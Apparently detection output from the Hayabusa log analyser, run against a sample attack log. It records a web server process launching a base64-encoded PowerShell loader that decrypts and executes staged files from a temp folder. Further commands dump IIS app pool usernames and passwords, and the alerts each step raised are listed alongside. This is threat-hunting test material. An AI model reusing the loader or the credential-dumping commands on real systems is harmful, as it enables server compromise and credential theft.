+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.000 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 